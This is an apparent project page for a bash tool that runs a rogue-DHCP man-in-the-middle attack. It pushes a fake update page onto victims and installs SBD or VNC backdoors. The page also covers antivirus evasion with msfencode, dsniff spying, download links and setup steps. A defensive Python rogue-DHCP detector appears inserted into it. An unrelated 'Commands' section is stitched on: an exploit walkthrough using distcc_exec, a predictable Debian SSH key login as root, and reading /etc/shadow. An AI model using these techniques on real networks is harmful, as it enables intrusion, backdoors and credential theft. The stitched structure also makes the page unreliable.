metasploit-fakeUpdate[v0.1.4].sh

This is a bash script to automate 'Man in the Middle' to 'pwn' whoever it can, via giving them a "Fake Update" screen. The attack is transparent (allowing the target to surf the inter-webs afterwards, once they have been exploited!), and the payload is either SBD (Secure BackDoor - similar to netcat!), VNC (remote desktop) or whatever the attacker wishes to use.

Links

Download video: http://download.g0tmi1k.com/videos_archive/metasploit-FakeUpdate_v0.1.mp4

Method

  • Sets up a DHCP and web server.
  • Creates an exploit with Metasploit.
  • Waits for the target to connect, download and run the exploit.
  • Once the target is successfully exploited, it is granted access so it can surf the inter-webs.
  • Uploads a backdoor, SBD or VNC, via the exploit.
  • The attacker has the option to run a few 'sniffing' programs (from the dsniff suite) to watch what the target does!
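The method above hinges on the attacker answering the target's DHCP request, so the target takes its gateway and DNS server from the attacker's machine. The Python below is an added, defender-side example (it is not part of g0tmi1k's script): it parses a raw DHCPOFFER payload and flags offers whose server identifier is not in an allowlist of known DHCP servers, and notes when the answering host names itself as both gateway and resolver, which is the shape of a fakeUpdate-style offer. KNOWN_DHCP_SERVERS and the two sample packets are constructed assumptions; the addresses reuse the page's 192.168.1.0/24 range.

```python
import struct

# Assumption: the site's legitimate DHCP server(s). Adjust for your network.
KNOWN_DHCP_SERVERS = {"192.168.1.1"}

BOOTP_FMT = "!BBBBIHH4s4s4s4s16s64s128s"   # fixed 236-byte BOOTP header
BOOTP_LEN = struct.calcsize(BOOTP_FMT)      # 236
MAGIC_COOKIE = b"\x63\x82\x53\x63"

OPT_ROUTER, OPT_DNS, OPT_MSG_TYPE, OPT_SERVER_ID = 3, 6, 53, 54
DHCPOFFER = 2


def ip_to_bytes(ip: str) -> bytes:
    return bytes(int(octet) for octet in ip.split("."))


def bytes_to_ip(raw: bytes) -> str:
    return ".".join(str(b) for b in raw)


def build_dhcp_offer(xid: int, yiaddr: str, server_id: str, router: str, dns: list) -> bytes:
    """Constructed DHCPOFFER payload (UDP body only), used here as sample input."""
    header = struct.pack(BOOTP_FMT,
                         2, 1, 6, 0,                        # op=BOOTREPLY, htype=Ethernet, hlen=6, hops
                         xid, 0, 0,                         # xid, secs, flags
                         bytes(4), ip_to_bytes(yiaddr),     # ciaddr, yiaddr (offered address)
                         ip_to_bytes(server_id), bytes(4),  # siaddr, giaddr
                         bytes(16), bytes(64), bytes(128))  # chaddr, sname, file
    options = MAGIC_COOKIE
    options += bytes([OPT_MSG_TYPE, 1, DHCPOFFER])
    options += bytes([OPT_SERVER_ID, 4]) + ip_to_bytes(server_id)
    options += bytes([OPT_ROUTER, 4]) + ip_to_bytes(router)
    options += bytes([OPT_DNS, 4 * len(dns)]) + b"".join(ip_to_bytes(d) for d in dns)
    options += b"\xff"                                      # end option
    return header + options


def parse_dhcp(payload: bytes) -> dict:
    """Parse the BOOTP header and DHCP TLV options; rejects truncated input."""
    if len(payload) < BOOTP_LEN + 4 or payload[BOOTP_LEN:BOOTP_LEN + 4] != MAGIC_COOKIE:
        raise ValueError("not a DHCP message")
    fields = struct.unpack(BOOTP_FMT, payload[:BOOTP_LEN])
    msg = {"op": fields[0], "xid": fields[4], "yiaddr": bytes_to_ip(fields[8]), "options": {}}
    i = BOOTP_LEN + 4
    while i < len(payload):
        code = payload[i]
        if code == 0:            # pad option, no length byte
            i += 1
            continue
        if code == 255:          # end option
            break
        if i + 1 >= len(payload):
            raise ValueError("truncated option header")
        length = payload[i + 1]
        data = payload[i + 2:i + 2 + length]
        if len(data) != length:
            raise ValueError("truncated option data")
        msg["options"][code] = data
        i += 2 + length
    return msg


def classify_offer(payload: bytes, known_servers=KNOWN_DHCP_SERVERS):
    """Return a verdict dict for a DHCPOFFER, or None if the message is not an OFFER."""
    msg = parse_dhcp(payload)
    opts = msg["options"]
    if opts.get(OPT_MSG_TYPE) != bytes([DHCPOFFER]):
        return None
    server = bytes_to_ip(opts.get(OPT_SERVER_ID, bytes(4)))
    router = bytes_to_ip(opts[OPT_ROUTER]) if OPT_ROUTER in opts else None
    dns_raw = opts.get(OPT_DNS, b"")
    dns = [bytes_to_ip(dns_raw[k:k + 4]) for k in range(0, len(dns_raw), 4)]
    return {
        "xid": msg["xid"],
        "offered": msg["yiaddr"],
        "server": server,
        "router": router,
        "dns": dns,
        # An unknown server identifier means something other than the real DHCP server answered.
        "rogue": server not in known_servers,
        # Supporting indicator: the answering host hands out itself as both gateway and resolver.
        "self_routed": router == server and dns == [server],
    }


if __name__ == "__main__":
    legit = build_dhcp_offer(0x3903F326, "192.168.1.105", "192.168.1.1", "192.168.1.1", ["192.168.1.1"])
    rogue = build_dhcp_offer(0x3903F326, "192.168.1.105", "192.168.1.50", "192.168.1.50", ["192.168.1.50"])
    for name, pkt in (("legit", legit), ("rogue", rogue)):
        print(name, classify_offer(pkt))
```

In practice you would feed classify_offer the UDP bodies of traffic to port 68 taken from a capture or a monitoring port; the "rogue" flag is the one to alert on, while "self_routed" is only corroborating, since a small network's real DHCP server is often also its gateway and resolver.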

Tools

  • A network with a client
  • An Internet connection (though you could modify it so it's non-transparent)
  • dhcpd3, apache, Metasploit, dsniff suite --- All on BackTrack
  • The script! metasploit-fakeUpdate[v0.1.4].tar.gz (489 KB, SHA1: aac4554f2d09e2a3f1b1061abe3759d445771b5e)

What's in the tar.gz?

  • metasploit-fakeUpdate.sh --- Bash script
  • www/index.php --- The page the target is forced to see before they have access to the Internet.
  • www/sbd.exe --- SBD Backdoor
  • www/winvnc.exe, vnchooks.dll, vnc.reg --- VNC Backdoor
  • www/Linux.jpg, OSX.jpg, Windows.jpg --- OS Pictures
  • www/favicon.ico, animated_favicon1.gif --- FavIcons

How to use it?

  1. Extract the tar.gz file (via tar zxf metasploit-fakeUpdate[v0.1.4].tar.gz).
  2. Copy the "www" folder to /var/www (cp www/* /var/www/)
  3. Make sure to "Start Network" and to have an IP address. (via start-network and dhclient [Internet Interface])
  4. Edit metasploit-fakeupdate.sh with your "internet" interface. (You can view your interfaces via ifconfig and use kate to edit the file.)
  5. bash metasploit-fakeupdate.sh (don't forget to be in the correct folder!)
  6. Wait for a connection...
  7. ...Game Over.

Commands

nmap 192.168.1.1/24
nmap -sS -sV -p1-65535 -O -f -n -v 192.168.1.105
msfconsole
search distcc
use exploit/unix/misc/distcc_exec
show options
setg RHOST 192.168.1.105
show payloads
setg payload generic/cmd/unix/bind_perl
show options
exploit
ls
whoami
ls -lart /root
ls -lart /root/.ssh
cat /root/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2UqUGIzIu/WwgztLZs5/D9IyhtRWocyQPEkcPJz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOcWv8Vw7bwkf1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w== msfadmin@metasploitable
Firefox www.exploit-db.com -> Debian OpenSSL Predictable (5720) ->
tar jxvf debian_ssh_rsa_2048_x86.tar.bz2
cd rsa/2048/
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0OhWBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2UqUGIzIu/WwgztLZs5/D9IyhtRWocyQPEkcPJz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOcWv8Vw7bwkf1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w *.pub
ssh -i 57c3115d77c56390332dc5c49978627a-5429 root@192.168.1.105
whoami
hostname
ifconfig
cat /etc/shadow

Notes

  • Based on fakeAP_pwn.
  • The video uses metasploit-fakeUpdate.sh v0.1
  • It's worth doing this "manually" (without the script) before using the script, so you have an idea of what's happening, and why. The script is only meant to save time.
  • I'm running BackTrack 4 Final in a VM. The target is running Windows XP Pro SP3 (fully up-to-date 2010-05-13), with no firewall and no AV.
  • The connection is reversed - so the connection comes from the target to the attacker; therefore, as the attacker is the server, it could help out with firewalls...
  • As you can see in the code, one day I plan for this to also "affect" Linux and/or OSX... but it's taken me this long to update it - so don't hold your breath!

Song: DJ Mummy vs Sean Paul - Nuttin No Go So (Bubbling Remix)

Video length: 3:20

Capture length: 7:59

Blog Post: https://blog.g0tmi1k.com/2010/06/script-video-metasploit-fakeupdate/


v0.1.4

  • [+] Added arguments
  • [+] Can detect and use the broadcast address if needed
  • [+] Checks for superuser
  • [+] Checks that interfaces/paths/files exist
  • [+] Randomizes ports each time
  • [+] Reversed the VNC connection
  • [+] Stops and removes any existing backdoors
  • [+] Stops any services and/or programs currently running
  • [+] Uses "msfencode" - to prevent detection
  • [+] Webpage now has a "favicon"
  • [>] Fixed a few minor features - a couple of silly typos
  • [>] General code improvements
  • [>] Improved "clean up" code
  • [>] Improved checking of the target's IP address
  • [>] Renamed the backdoor files
  • [>] Renamed the output windows
  • [>] Updated the help message
  • [>] Waits a little bit longer in places

v0.1.2

  • [+] Fixed gateway bug
  • [+] Checks for other index files, and acts on it.
  • [+] Checks to make sure the user copied www/, else acts on it.
  • [+] Added more tools to "extra".
  • [+] Added extra settings
  • [>] Aligned the output windows
  • [>] General code improvements
  • [>] Improved debug info
  • [>] "Started" work on allowing a custom backdoor (needs more work) - Removed Linux/OSX, as it was confusing people

v0.1.1

  • [+] First public release